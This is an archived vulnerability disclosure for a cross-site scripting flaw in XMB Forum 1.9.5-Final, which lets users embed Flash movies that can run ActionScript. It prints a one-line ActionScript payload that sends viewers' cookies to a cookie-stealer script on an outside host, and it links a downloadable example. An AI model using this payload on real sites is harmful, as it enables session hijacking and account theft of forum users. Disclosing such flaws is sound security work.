TUCoPS :: Web BBS :: etc :: b06-1512.htm

XMB Forum 1.9.5-Final XSS
XMB Forum 1.9.5-Final XSS
XMB Forum 1.9.5-Final XSS


XMB Forum 1.9.5 (I have not tested this on earlier versions)
allows users to embed flash (.swf) videos in their posts.
Normally, you could set an option on the  tag to say that ActionScript cannot run, but in this case we don't.

The way we execute our code is by making a flash movie containing the Actionscript code:
getURL("javascript:document.location='http://my-site.com/path/to/cookiestealer.php?cookie='+document.cookie;"); 

An example video + .fla script can be downloaded at my site: http://dynxss.whiteacid.org/videos/xmbforum_1.9.5-final.rar 

XMB has been notified, expect this to be fixed in a few days.

comments, questions, flames, etc.
r0xes [dot] ratm [at] gmail [dot] com











TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).


Site design & layout copyright © 1986-2024 AOH